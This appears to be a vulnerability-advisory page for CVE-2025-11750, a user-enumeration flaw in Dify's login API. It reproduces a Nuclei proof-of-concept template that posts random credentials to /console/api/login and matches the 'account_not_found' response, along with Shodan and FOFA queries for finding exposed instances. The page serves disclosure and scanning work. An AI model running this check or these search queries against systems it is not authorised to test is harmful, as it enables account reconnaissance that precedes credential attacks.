CVE-2025-11750: Dify - User Enumeration via "Account not found" Message

日期: 2025-08-01 | 影响软件: Dify | POC: 已公开

漏洞描述

A user enumeration vulnerability exists in langgenius/dify, where the login API leaks information about whether a user account exists or not. When an invalid/non-existent email is used during login, the API returns a distinct error message such as "account_not_found" or "Account not found.", allowing attackers to identify valid accounts.

PoC代码[已公开]

id: CVE-2025-11750

info:
  name: Dify - User Enumeration via "Account not found" Message
  author: Kazgangap
  severity: medium
  description: |
    A user enumeration vulnerability exists in langgenius/dify, where the login API leaks information about whether a user account exists or not. When an invalid/non-existent email is used during login, the API returns a distinct error message such as "account_not_found" or "Account not found.", allowing attackers to identify valid accounts.
  reference:
    - https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11750.md
    - https://github.com/langgenius/dify/issues/24323
    - https://github.com/langgenius/dify/pull/25369
  metadata:
    verified: true
    vendor: langgenius
    product: dify
    shodan-query: http.favicon.hash:"97378986"
    fofa-query: icon_hash="97378986"
  tags: cve,cve2025,langgenius,dify,user-enum,vuln

variables:
  fake_email: "{{to_lower(rand_text_alphanumeric(16))}}@{{to_lower(rand_text_alphanumeric(16))}}.com"
  fake_password: "{{rand_text_alphanumeric(16)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<title>Dify")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /console/api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{fake_email}}","password":"{{fake_password}}","language":"en-EN","remember_me":true}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "account_not_found", "message")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 400'
        condition: and
# digest: 490a0046304402205fed6b24f4b5e1155d7b2e830369469afa3f59f98d56adc2daab74845431095f022050a2a5f494def09ee3dc09e7dd650beadec488391c03c9b64aa61aebbafa1f61:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-11750.yaml

相关漏洞推荐